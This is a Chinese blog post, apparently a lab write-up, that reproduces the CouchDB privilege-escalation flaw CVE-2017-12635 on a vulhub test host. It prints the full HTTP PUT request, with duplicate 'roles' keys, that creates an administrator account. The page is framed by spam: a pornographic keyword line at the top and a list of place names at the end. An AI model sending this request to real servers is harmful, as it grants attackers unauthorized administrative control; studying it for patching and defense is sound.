91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

couchdb垂直越權漏洞CVE-2017-12635復現是怎么進行的

發布時間:2021-12-29 17:42:13 來源:億速云 閱讀:134 作者:柒染 欄目:安全技術

這篇文章將為大家詳細講解有關couchdb垂直越權漏洞CVE-2017-12635復現是怎么進行的,文章內容質量較高,因此小編分享給大家做個參考,希望大家閱讀完這篇文章后對相關知識有一定的了解。

CouchDB 是一個開源的面向文檔的數據庫管理系統,可以通過 RESTful JavaScript Object Notation (JSON) API 訪問。術語 “Couch” 是 “Cluster Of Unreliable Commodity Hardware” 的首字母縮寫,它反映了 CouchDB 的目標具有高度可伸縮性,提供了高可用性和高可靠性,即使運行在容易出現故障的硬件上也是如此。

CVE-2017-12635是由于Erlang和JavaScript對JSON解析方式的不同,導致語句執行產生差異性導致的。這個漏洞可以讓任意用戶創建管理員,屬于垂直權限繞過漏洞。

下面僅作漏洞復現記錄與實現,利用流程如下:

一、漏洞環境

目標鏈接:http://192.168.101.152:5984/

直接訪問是這樣子的

couchdb垂直越權漏洞CVE-2017-12635復現是怎么進行的

訪問http://192.168.101.152:5984/_utils/后如下

couchdb垂直越權漏洞CVE-2017-12635復現是怎么進行的

直接點擊_users會提示無權訪問數據庫

couchdb垂直越權漏洞CVE-2017-12635復現是怎么進行的

二、利用流程

首先發送第一個數據包,會提示403錯誤,提示只有管理員可以設置角色

couchdb垂直越權漏洞CVE-2017-12635復現是怎么進行的

但發送包含兩個roles的數據包,即可繞過限制,創建一個管理員賬戶,這里創建了一個賬戶密碼皆為vulhub的管理員賬戶

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.101.152:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}

couchdb垂直越權漏洞CVE-2017-12635復現是怎么進行的

再回到前臺登錄,已經可以訪問了

couchdb垂直越權漏洞CVE-2017-12635復現是怎么進行的

couchdb垂直越權漏洞CVE-2017-12635復現是怎么進行的

關于couchdb垂直越權漏洞CVE-2017-12635復現是怎么進行的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

砀山县| 浪卡子县| 杭锦后旗| 凉城县| 金坛市| 苍山县| 开阳县| 灌阳县| 洛宁县| 固阳县| 德昌县| 遵义市| 石城县| 安图县| 壤塘县| 延吉市| 巨鹿县| 来凤县| 吉木萨尔县| 建水县| 左权县| 阜宁县| 铜梁县| 铜川市| 凉山| 同江市| 邹城市| 开远市| 定日县| 治多县| 科技| 方山县| 霍城县| 荔浦县| 湖南省| 五河县| 汉沽区| 阆中市| 宁德市| 乌拉特前旗| 伽师县|